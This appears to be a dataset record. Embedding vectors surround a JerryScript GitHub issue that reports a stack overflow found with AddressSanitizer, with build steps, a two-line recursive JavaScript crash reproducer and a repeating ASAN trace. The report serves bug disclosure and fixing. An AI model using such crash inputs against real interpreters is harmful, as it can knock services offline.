-0.012951888144016266, -0.0012443371815606952, 0.0013305873144418001, -0.028620652854442596, -0.008725633844733238, -0.004883910994976759, 0.029224403202533722, -0.013016575016081333, -0.004725785925984383, -0.031941283494234085, 0.013038137927651405, -0.006357349921017885, 0.009559384547173977, 0.00041373088606633246, 0.016890641301870346, 0.010587197728455067, -0.0234600231051445, 0.00023606469039805233, 0.003687191056087613, 0.018026268109679222, 0.00007670417835470289, 0.004560473375022411, 0.013016575016081333, -0.004937817342579365, 0.006371724884957075, 0.006303443573415279, 0.006213599815964699, 0.030705031007528305, 0.009638447314500809, -0.011442511342465878, -0.01696251705288887, -0.027758153155446053, 0.016215015202760696, -0.003992660436779261, 0.017422517761588097, 0.019765645265579224, -0.006544225383549929, -0.022640647366642952, -0.000588477123528719, -0.0062890686094760895, -0.026263151317834854, -0.0021616427693516016, -0.02140439674258232, 0.017436891794204712, -0.0031912531703710556, 0.012786575593054295, 0.0035254722461104393, -0.0033799251541495323, 0.002193986438214779, -0.028735652565956116, 0.014748764224350452, -0.010443448089063168, -0.02087252028286457, -0.009854072704911232, -0.01515126507729292, -0.001962189329788089, 0.012455949559807777, 0.016660641878843307, -0.0019046893576160073, -0.015309390611946583, -0.01150719914585352, 0.010666260495781898, -0.00037105506635271013, 0.0020753927528858185, -0.005473286844789982, 0.01684751734137535, 0.008510008454322815, 0.010630322620272636, 0.022626273334026337, -0.014640952460467815, -0.004244222771376371, -0.012283449992537498, -0.00539422407746315, -0.01084594801068306, 0.011025635525584221, -0.007381569594144821, -0.029253153130412102, -0.008452508598566055, 0.007510944735258818, -0.00883344653993845, 0.002291017910465598, 0.006795788183808327, 0.0163156408816576, -0.014863764867186546, -0.006120162084698677, 0.008438133634626865, -0.01566876471042633, -0.006278287619352341, -0.025242524221539497, 0.016948141157627106, -0.0008616024279035628, -0.01625814102590084, -0.011823449283838272, 0.009523446671664715, 0.007740945089608431, -0.002883987268432975, 0.008747195824980736, 0.008438133634626865, 0.0034248470328748226, -0.012621262110769749, -0.015941889956593513, 0.015525015071034431, -0.022123146802186966, 0.0007030280539765954, 0.01351970061659813, -0.01009844709187746, -0.014188138768076897, -0.014878139831125736, -0.024063773453235626, -0.006989850662648678, -0.012362511828541756, -0.0034176595509052277, 0.005785943008959293, -0.009192821569740772, 0.019923768937587738, -0.008869383484125137, 0.02174939587712288, 0.01447563897818327, -0.00205383007414639, 0.014791890047490597, 0.013843138702213764, 0.003173284465447068, -0.02146189659833908, 0.006400475278496742, -0.013304075226187706, 0.005390630569308996, -0.001292852801270783, 0.008826258592307568, 0.006961100734770298, 0.0024473462253808975, 0.023790648207068443, 0.008704070933163166, 0.009451571851968765, -0.011370636522769928, -0.00034792025689966977, 0.025831900537014008, 0.008632196113467216, -0.018083767965435982, -0.018069392070174217, 0.00993313454091549, 0.004729379899799824, -0.006849694065749645, 0.01898939348757267, -0.012980638071894646, -0.019981270655989647, -0.013778450898826122, -0.04303879290819168, -0.0032954721245914698, 0.01901814341545105, -0.01250626239925623, 0.005333130247890949, 0.004718598444014788, 0.004869536031037569, -0.020656894892454147, 0.014791890047490597, 0.005775162018835545, -0.007295319810509682, 0.028232527896761894, -0.011032823473215103, 0.007661882787942886, -0.004068129230290651, 0.008653759025037289, -0.007025788072496653, -0.005717661697417498, -0.006874850485473871, 0.011485636234283447, 0.004405941814184189, -0.038553789258003235, -0.02151939645409584, 0.0007120124064385891, -0.014748764224350452, -0.014353451319038868, -0.01264282502233982, -0.01413782685995102, -0.00540859904140234, 0.0067814127542078495, -0.006184849888086319, 0.00037397496635094285, -0.00003885745900333859, 0.006285475101321936, 0.00618844386190176, 0.0016989470459520817, 0.026234401389956474, 0.025256900116801262, -0.007417507469654083, 0.016243766993284225, 0.005146255251020193, 0.014295951463282108, 0.00792063307017088, -0.020527521148324013, 0.0070976633578538895, 0.004086097702383995, -0.0134190758690238, -0.033235032111406326, 0.010623135603964329, -0.016976891085505486, 0.009602509438991547, 0.014806265011429787, -0.00088181730825454, 0.0000052011159823450726, 0.021648772060871124, -0.012563762255012989, 0.005157036241143942, 0.002425783546641469, 0.02563065104186535, -0.015927515923976898, 0.01875939406454563, -0.007719382643699646, -0.012125324457883835, 0.003633284941315651, 0.014180951751768589, -0.0073312572203576565, -0.017365017905831337, -0.009034696035087109, 0.01513689011335373, -0.03898504003882408, -0.007740945089608431, -0.021116895601153374, 0.029195653274655342, 0.02427939884364605, 0.012556575238704681, -0.003881253767758608, 0.014561889693140984, 0.0009168563992716372, -0.01347657572478056, -0.03441378474235535, -0.013124387711286545, 0.009631259366869926, -0.008855008520185947, -0.006677194032818079, -0.01817001774907112, -0.0050240675918757915, -0.010127197951078415, -0.003202034393325448, -0.012154074385762215, 0.0019226581789553165, 0.014001264236867428, 0.006504693999886513, 0.004258598200976849, 0.03820878639817238, 0.007697820197790861, -0.0007632233900949359, -0.007805632892996073, 0.02160564623773098, -0.0039567225612699986, -0.007119225803762674, -0.007870320230722427, -0.014835014939308167, -0.01637314073741436, 0.021936271339654922, 0.012125324457883835, 0.01077407319098711, 0.018716268241405487, -0.00393156660720706, 0.002326955320313573, -0.008351882919669151, -0.005685318261384964, 0.013900638557970524, -0.0011913293274119496, 0.004402348306030035, -0.03171128034591675, -0.005908130668103695, -0.0037159412167966366, -0.00336914393119514, -0.00721625704318285, -0.0025479712057858706, 0.01155032403767109, -0.00911375880241394, 0.013304075226187706, 0.010500947944819927, -0.011176574043929577, -0.001364727970212698, 0.005484067834913731, -0.01817001774907112, -0.014504389837384224, 0.022008147090673447, 0.007219851016998291, 0.0068640694953501225, 0.012542200274765491, -0.0019316425314173102, 0.007733757607638836, 0.006971881724894047, -0.00409328518435359, 0.005182192660868168, -0.0019783612806349993, -0.0006742780096828938, -0.008323132991790771, 0.0038021912332624197, 0.0028480496257543564, 0.004898285958915949, 0.01275782473385334, 0.00042136761476285756, -0.007956570014357567, -0.010795636102557182, -0.004474223125725985, 0.02816065214574337, 0.006558600347489119, 0.004628754686564207, -0.010213447734713554, 0.003148128045722842, -0.0027923465240746737, -0.011586261913180351, 0.0008032039040699601, 0.00723063200712204, -0.020613770931959152, -0.0005053716013208032, 0.01575501635670662, -0.006792194209992886, -0.006759850308299065, 0.004617973230779171, -0.0004487699770834297, 0.007820007391273975, -0.012355324812233448, 0.0003845316241495311, -0.0010880088666453958, 0.006479537580162287, -0.022913772612810135, 0.004984536208212376, 0.00911375880241394, 0.0037770350463688374, 0.010350010357797146, -0.010996885597705841, 0.0016028140671551228, 0.01367063820362091, 0.013828763738274574, -0.026579400524497032, -0.0016666032606735826, 0.009228759445250034, -0.013023762963712215, -0.006044693291187286, -0.005182192660868168, 0.002179611474275589, 0.01637314073741436, -0.001955001847818494, -0.01147844921797514, -0.03389628231525421, -0.013778450898826122, -0.004287348128855228, 0.015798140317201614, 0.010637510567903519, -0.010810011066496372, -0.012944700196385384, 0.006213599815964699, -0.02404939942061901, 0.0028857840225100517, 0.009250321425497532, 0.007273757364600897, -0.0047725047916173935, 0.014267201535403728, 0.007740945089608431, -0.0012470324290916324, -0.016056891530752182, -0.0070725069381296635, 0.02892252802848816, -0.013411887921392918, 0.009796571917831898, 0.0032649252098053694, 0.005850630812346935, -0.0021814084611833096, -0.001081719878129661, 0.013857513666152954, -0.011579073965549469, 0.007640319876372814, 0.024825649335980415, 0.0009415634558536112, 0.0002928909088950604, -0.014978764578700066, -0.007554070092737675, -0.01875939406454563, 0.000689551467075944, -0.0003618460614234209, -0.011104698292911053, -0.015740640461444855, 0.0022101583890616894, 0.022626273334026337, -0.006616100203245878, 0.008366257883608341, 0.016013765707612038, 0.006483131553977728, 0.009494696743786335, 0.0007564850966446102, 0.0013782044406980276, -0.004377191886305809, 0.0028552371077239513, 0.009695947170257568, 0.010350010357797146, 0.0005561333382502198, -0.02213752269744873, -0.006112974602729082, -0.0000900684462976642, 0.007205476053059101, -0.019909394904971123, 0.004168753977864981, -0.0030367218423634768, -0.00993313454091549, 0.002745627658441663, 0.010738135315477848, -0.01749439164996147, -0.013383137993514538, -0.005376255139708519, 0.006156099960207939, 0.003845316357910633, -0.008775945752859116, 0.02151939645409584, 0.0007425593212246895, 0.005987193435430527, -0.0044885980896651745, -0.003534456714987755, 0.008545946329832077, -0.024566899985074997, -0.002828284166753292, 0.010249385610222816, -0.03792128711938858, -0.013584388419985771, 0.0030439093243330717, 0.0013683217111974955, 0.0097750099375844, 0.0014662514440715313, 0.011305948719382286, 0.015783766284585, -0.024969398975372314, 0.006238756235688925, 0.003687191056087613, -0.00811469554901123, -0.008912508375942707, -0.003227190813049674, 0.0035254722461104393, -0.022525647655129433, -0.0013557435013353825, 0.05361880362033844, -0.010350010357797146, 0.022583147510886192, 0.026852525770664215, -0.00984688475728035, -0.001583946868777275, 0.0033799251541495323, 0.002438361756503582, -0.0026737526059150696, 0.011636573821306229, -0.001169766765087843, -0.003056487301364541, 0.0028210964519530535, 0.004179535433650017, 0.0008117390680126846, 0.010120010003447533, 0.002344924258068204, -0.011255635879933834, 0.0035110972821712494, -0.012333761900663376, -0.003654847387224436, 0.02939690463244915, 0.02489752508699894, -0.011722824536263943, 0.001574064022861421, 0.027226276695728302, 0.006943131797015667, -0.0035973472986370325, 0.009322197176516056, 0.005663755815476179, 0.027729403227567673, -0.0033026596065610647, 0.0029253154061734676, -0.00623156875371933, -0.006519068963825703, 0.009077821858227253, 0.005893755704164505, 0.025530025362968445, -0.016718141734600067, 0.0013503528898581862, 0.001059258822351694, -0.007209069561213255, -0.013828763738274574, 0.000908770423848182, 0.005016880109906197, -0.012427199631929398, 0.0034104720689356327, 0.028908153995871544, 0.030475029721856117, 0.004193910397589207, 0.03685753792524338, 0.007884695194661617, 0.007395945023745298, -0.02208002097904682, -0.0013844935456290841, -0.00455687940120697, -0.007820007391273975, -0.00786313321441412, -0.0007609773310832679, -0.005218130070716143, 0.002763596596196294, -0.01509376522153616, -0.006242349743843079, -0.015021889470517635, -0.011988761834800243, -0.0011185557814314961, -0.016100015491247177, 0.0028821902815252542, -0.003009768668562174, 0.009106571786105633, 0.012441574595868587, -0.02248252183198929, -0.03766253590583801, 0.0006015045219101012, -0.0012542200274765491, -0.01270032487809658, 0.011765949428081512, -0.010292510502040386, -0.0068568820133805275, 0.0065657878294587135, -0.027053777128458023, -0.004966567270457745, -0.009135321713984013, 0.005110317375510931, 0.00041957071516662836, -0.01620064117014408, 0.0029055497143417597, -0.009710322134196758, 0.0038021912332624197, 0.027700653299689293, 0.0028067214880138636, -0.018356893211603165, 0.006698756478726864, 0.0015138686867430806, 0.0005125590832903981, -0.017853768542408943, -0.011931261979043484, -0.007007819600403309, 0.004413129296153784, 0.008517196401953697, 0.0027600026223808527, 0.006120162084698677, -0.008783133700489998, 0.006537037901580334, 0.008093132637441158, 0.009465946815907955, 0.008610633201897144, -0.008970009163022041, -0.002961253048852086, 0.01887439377605915, -0.0001033204171108082, -0.009451571851968765, -0.000982891651801765, -0.0014375013997778296, 0.012240324169397354, 0.013397512957453728, -0.0036045347806066275, 0.004308910574764013, -0.012118137441575527, 0.022439397871494293, -0.011916887015104294, -0.020125020295381546, 0.015352515503764153, 0.01246313750743866, 0.017321892082691193, 0.010500947944819927, 0.002643205691128969, 0.03237253054976463, 0.012312199920415878, -0.013282513245940208, 0.0011068760650232434, -0.015970641747117043, -0.00015441910363733768, 0.006562193855643272, 0.008423758670687675, 0.015956265851855278, 0.004276566673070192, 0.011090323328971863, 0.017681267112493515, 0.0006154302973300219, -0.009307821281254292, 0.05520005524158478, -0.029023153707385063, 0.019952518865466118, -0.02354627288877964, 0.01769564300775528, -0.015568140894174576, 0.008459695614874363, -0.011960011906921864, -0.025731274858117104, 0.005746412090957165, 0.015237514860928059, 0.0030115654226392508, -0.010112822987139225, 0.0038273476529866457, 0.0018319159280508757, 0.013893451541662216, 0.014396577142179012, -0.006720319390296936, -0.010091260075569153, 0.00978938490152359, 0.002569533884525299, -0.004632348194718361, 0.0115359490737319, -0.002005314454436302, 0.011004073545336723, 0.0052576614543795586, -0.010429073125123978, -0.00377344130538404, 0.020886896178126335, -0.03372378274798393, -0.01086032297462225, 0.006393287796527147, -0.01878814399242401, 0.006882037967443466, 0.011880949139595032, 0.022971272468566895, -0.004826411139219999, 0.008430945686995983, 0.0073132882826030254, 0.009523446671664715, -0.012851262465119362, 0.012319386936724186, 0.003780628787353635, 0.029698779806494713, -0.0009882822632789612, -0.008747195824980736, 0.0018247283296659589, 0.007769695017486811, -0.008855008520185947, 0.003034924855455756, -0.013368763029575348, 0.007352819666266441, 0.013778450898826122, 0.006932350806891918, 0.010781261138617992, 0.0136850131675601, 0.02222377248108387, 0.003917191177606583, 0.012951888144016266, 0.020513145253062248, -0.021562522277235985, -0.008840633556246758, 0.019032519310712814 ]
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision e191a5cf47eeaf3e36098e49a138885f913c0dd1 (latest master - 2021.01.29.) ###### Build platform Ubuntu 16.04.1 (Linux 4.15.0-117-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on --compile-flag=-Wno-uninitialized --compile-flag=-Wno-missing-field-initializers --link-lib="m" ``` ###### Test case ``` // test.js a= function() { b = function() { a();}();} b = function() { a(); }(); ``` ###### Output ``` ASAN:DEADLYSIGNAL ================================================================= ==3701==ERROR: AddressSanitizer: stack-overflow on address 0xff08aef4 (pc 0x0813006d bp 0xff08b318 sp 0xff08aee0 T0) #0 0x813006c in malloc (/home/lily/Desktop/crash-analyze/jerry-crash+0x813006c) #1 0x828c19e in jmem_heap_alloc /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/jmem/jmem-heap.c:254:10 #2 0x828c19e in jmem_heap_gc_and_alloc_block /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/jmem/jmem-heap.c:298 #3 0x81c5133 in ecma_create_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/base/ecma-helpers.c:79:38 #4 0x822bc86 in ecma_op_create_function_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:366:27 #5 0x822bee2 in ecma_op_create_any_function_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:590:10 #6 0x83198e9 in vm_construct_literal_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:486:18 #7 0x83075a6 in vm_loop /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:1085:9 #8 0x82f1baf in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4948:37 #9 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #10 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #11 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #12 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #13 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #14 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #15 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #16 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #17 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #18 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #19 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #20 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #21 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #22 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #23 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #24 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #25 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #26 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #27 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #28 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #29 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #30 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #31 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #32 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #33 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #34 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 ... ``` ###### Expected behavior Please handle the situation that circular references exist in a javascript file and throw a RangeError.
Uncaught RangeError causes stack overflow
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4554/comments
4
2021-01-30T04:18:28
2021-02-01T11:37:57Z
https://github.com/jerryscript-project/jerryscript/issues/4554
797,331,128
4,554
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : Uncaught RangeError causes stack overflow Issue date: --- start body --- ###### JerryScript revision e191a5cf47eeaf3e36098e49a138885f913c0dd1 (latest master - 2021.01.29.) ###### Build platform Ubuntu 16.04.1 (Linux 4.15.0-117-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --lto=off --error-message=on --system-allocator=on --compile-flag=-Wno-uninitialized --compile-flag=-Wno-missing-field-initializers --link-lib="m" ``` ###### Test case ``` // test.js a= function() { b = function() { a();}();} b = function() { a(); }(); ``` ###### Output ``` ASAN:DEADLYSIGNAL ================================================================= ==3701==ERROR: AddressSanitizer: stack-overflow on address 0xff08aef4 (pc 0x0813006d bp 0xff08b318 sp 0xff08aee0 T0) #0 0x813006c in malloc (/home/lily/Desktop/crash-analyze/jerry-crash+0x813006c) #1 0x828c19e in jmem_heap_alloc /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/jmem/jmem-heap.c:254:10 #2 0x828c19e in jmem_heap_gc_and_alloc_block /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/jmem/jmem-heap.c:298 #3 0x81c5133 in ecma_create_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/base/ecma-helpers.c:79:38 #4 0x822bc86 in ecma_op_create_function_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:366:27 #5 0x822bee2 in ecma_op_create_any_function_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:590:10 #6 0x83198e9 in vm_construct_literal_object /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:486:18 #7 0x83075a6 in vm_loop /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:1085:9 #8 0x82f1baf in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4948:37 #9 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #10 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #11 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #12 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #13 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #14 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #15 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #16 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #17 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #18 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #19 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #20 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #21 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #22 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #23 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #24 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #25 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #26 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #27 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #28 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #29 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 #30 0x822dfa7 in ecma_op_function_call_simple /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1147:15 #31 0x822d7ab in ecma_op_function_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1377:14 #32 0x82f2372 in opfunc_call /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:792:24 #33 0x82f2372 in vm_execute /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:4954 #34 0x82f1204 in vm_run /home/ubuntu/lastest-jerryscript/jerryscript/jerry-core/vm/vm.c:5055:10 ... ``` ###### Expected behavior Please handle the situation that circular references exist in a javascript file and throw a RangeError. --- end body ---
5,403
[ -0.03946055471897125, -0.013694274239242077, -0.009032082743942738, 0.01077857706695795, 0.0026398380286991596, -0.0185026153922081, -0.02659933641552925, 0.03452067822217941, -0.053987886756658554, 0.008367098867893219, -0.010705502703785896, 0.017961859703063965, 0.008549787104129791, 0.008462096564471722, 0.02980002574622631, 0.013898883946239948, -0.028499290347099304, -0.015287311747670174, -0.018736455589532852, -0.02117716521024704, -0.011421638540923595, 0.01218892727047205, -0.02468477003276348, 0.04942799732089043, -0.024509388953447342, -0.013029290363192558, 0.0018040415598079562, -0.010186669416725636, -0.027447007596492767, -0.012145081534981728, -0.0025667629670351744, -0.0010038692271336913, -0.026920868083834648, 0.02722778357565403, 0.04051283746957779, 0.02107485942542553, 0.051824864000082016, 0.036771390587091446, -0.019379517063498497, -0.01234238501638174, 0.0003297514049336314, -0.031597673892974854, -0.04252970963716507, 0.048521868884563446, 0.009894369170069695, 0.06278612464666367, 0.045745015144348145, 0.012671222910284996, -0.05787548050284386, 0.011041647754609585, 0.016880348324775696, -0.017611099407076836, 0.0165149737149477, -0.0833640769124031, 0.012444689869880676, -0.025444749742746353, 0.017830325290560722, 0.003335878485813737, 0.020256418734788895, 0.03007771261036396, 0.03726830333471298, -0.0017483218107372522, -0.007767883129417896, 0.0031129992567002773, 0.010193976573646069, 0.05314021557569504, -0.015623456798493862, 0.027271628379821777, 0.006068887189030647, 0.019452592357993126, -0.00815518107265234, -0.021235624328255653, 0.03615755960345268, 0.028280064463615417, 0.014366565272212029, -0.0014313585124909878, -0.008695936761796474, 0.038963645696640015, -0.0227117408066988, -0.021820224821567535, -0.00557197630405426, 0.026277806609869003, -0.025240140035748482, 0.006328303832560778, -0.009090542793273926, 0.0036647163797169924, 0.006525606382638216, -0.0605061836540699, 0.004081244580447674, -0.017464948818087578, -0.0027037786785513163, 0.05258484184741974, -0.00975552573800087, 0.0027677195612341166, 0.005531785078346729, 0.01234238501638174, -0.024187859147787094, 0.01318274810910225, -0.032357655465602875, 0.013496971689164639, -0.020110268145799637, 0.013299668207764626, -0.015185005962848663, 0.0045708478428423405, -0.03349762782454491, 0.03188997507095337, -0.0006864492315798998, -0.019978733733296394, 0.04118512570858002, 0.11177567392587662, 0.025503210723400116, -0.02924465574324131, -0.04036668688058853, -0.010077056474983692, -0.009974751621484756, -0.010932034812867641, -0.004179895855486393, -0.025093989446759224, -0.026964712888002396, 0.024085553362965584, -0.05059720203280449, -0.012006239034235477, -0.01933567225933075, -0.013168133795261383, -0.040395915508270264, 0.023734793066978455, 0.014534637331962585, -0.020504873245954514, 0.020037192851305008, -0.031451523303985596, -0.046125005930662155, -0.020256418734788895, 0.021133318543434143, -0.022054065018892288, 0.035105280578136444, -0.02059256285429001, 0.0009518032311461866, 0.03568987920880318, -0.015053470619022846, -0.04118512570858002, -0.02639472670853138, -0.03209458291530609, 0.028806205838918686, -0.0023091731127351522, -0.004914300516247749, 0.00999667402356863, -0.02208329550921917, 0.017187263816595078, -0.05594629794359207, -0.02253636159002781, 0.007442699279636145, -0.020738713443279266, -0.002448015846312046, 0.045920394361019135, -0.0032956870272755623, -0.031831514090299606, -0.022770201787352562, 0.028981585055589676, 0.0036044293083250523, 0.0007978887879289687, -0.021513309329748154, -0.03285456448793411, -0.017581868916749954, -0.0252109095454216, -0.05173717066645622, 0.0005293377907946706, -0.001280641183257103, 0.02848467417061329, 0.011063570156693459, 0.004757189191877842, -0.014695403166115284, -0.009960136376321316, 0.017888784408569336, 0.038028281182050705, -0.028455445542931557, -0.0011454522609710693, 0.016471127048134804, 0.0019383170874789357, 0.015375001356005669, -0.014045034535229206, 0.03390684723854065, -0.0029357923194766045, -0.0036007757298648357, 0.009967443533241749, 0.01661727763712406, -0.019350286573171616, -0.007833651266992092, -0.02899620123207569, -0.0032883796375244856, -0.027447007596492767, -0.009097849950194359, -0.012634685263037682, 0.023135576397180557, 0.0041433582082390785, 0.032533034682273865, 0.015243466012179852, -0.019072601571679115, -0.032737646251916885, -0.012620070017874241, -0.011655478738248348, 0.037092920392751694, -0.004768150392919779, -0.02601473592221737, -0.007336740382015705, -0.03279610723257065, -0.01479770801961422, 0.006883674766868353, -0.013548123650252819, 0.008688629604876041, -0.015623456798493862, -0.018824147060513496, -0.022273290902376175, 0.011027032509446144, -0.03814520314335823, -0.021717920899391174, 0.001435012323781848, 0.012802758254110813, 0.0004996510106138885, -0.028177758678793907, -0.02513783425092697, 0.017888784408569336, -0.023880943655967712, -0.0252109095454216, -0.019657202064990997, -0.017026498913764954, -0.008125951513648033, -0.0246555395424366, 0.003913171589374542, -0.039343636482954025, -0.016120366752147675, 0.023135576397180557, 0.00289560086093843, -0.015462691895663738, 0.0027330087032169104, 0.030691543594002724, 0.014753863215446472, -0.029186196625232697, -0.010552044957876205, 0.014395794831216335, 0.015170390717685223, -0.004154319409281015, 0.00003296943032182753, -0.05848931148648262, -0.025956276804208755, 0.014103494584560394, 0.01208662148565054, -0.0381159745156765, -0.015345771797001362, -0.020987169817090034, -0.006262536160647869, -0.021966375410556793, -0.021191779524087906, -0.02089947834610939, -0.02980002574622631, -0.01749417930841446, 0.010617812164127827, 0.014892705716192722, 0.03229919448494911, -0.028645439073443413, -0.004687767941504717, 0.02513783425092697, 0.03203612565994263, -0.033293016254901886, 0.0241001695394516, 0.018824147060513496, 0.003699427004903555, -0.038437504321336746, 0.007329432759433985, 0.008367098867893219, -0.008359791710972786, 0.04457581043243408, -0.04147742688655853, -0.022346366196870804, -0.005133525934070349, -0.011867396533489227, 0.009163618087768555, 0.009046697989106178, 0.010690887458622456, 0.005634090397506952, -0.0016460167244076729, 0.0070992461405694485, 0.003178766928613186, 0.030019251629710197, 0.03411145880818367, -0.0048010339960455894, 0.0012696798657998443, 0.04440043121576309, 